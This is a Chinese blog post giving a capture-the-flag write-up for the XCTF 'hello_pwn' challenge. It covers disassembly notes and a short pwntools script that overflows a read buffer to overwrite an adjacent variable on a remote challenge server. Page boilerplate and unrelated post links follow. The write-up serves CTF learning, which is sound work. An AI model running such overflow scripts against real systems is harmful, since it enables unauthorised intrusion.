hello_pwn攻防世界pwn

checksec然后试运行


放入64位ida,看看main函数


点击read函数里的unk_601068,再点击if函数里的dword_60106C,发现他们只相差了0x601068-0x60106c=0x4,再点击sub_400686(),发现了拿到flag的地方


现在就很明朗了,用read函数栈溢出覆盖地址


点击h把int转成16进制

写脚本

#coding=utf8
from pwn import *
context.log_level = 'debug'
p = remote('111.198.29.45',37550)

payload = ''
payload += 0x4*'A'
payload += p64(0x6E756161)

p.sendline(payload)
p.interactive()
成功
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 0x00 get_shell 0x01 CGfsb 首先检查保护 nc连接输入信息为aaaa加很多个控制字符发现p...
    Adam_0阅读 12,343评论 0 30
  • 0x01 fd 文件描述符 0、1、2分别代表标准输入、标准输出和标准错误,所以输入0x1234的十进制值,再次...
    Nevv阅读 11,133评论 0 6
  • 今日意图,开心快乐的一天 今天在家度过了一天,上午在家,下午去找老姐,一整天很充实,也很开心。收获满满,具体有什么...
    国商1802王昊阅读 1,769评论 0 0
  • 第一件事 2007年12月24日,我去了上海电视台,见到了我喜欢时间最长,程度最深的偶像,当时也不知道是怎么回事,...
    princessdu阅读 1,112评论 0 0
  • 竹林 仍紧紧的攒在一起 梢顶泛黄的竹叶 叹了口气,飘零似麻雀飞落 竹根 抖动着苍白的胡子 嘴里不停得咒骂 梢上的竹...
    扬帆的阿杰阅读 2,860评论 0 1

友情链接更多精彩内容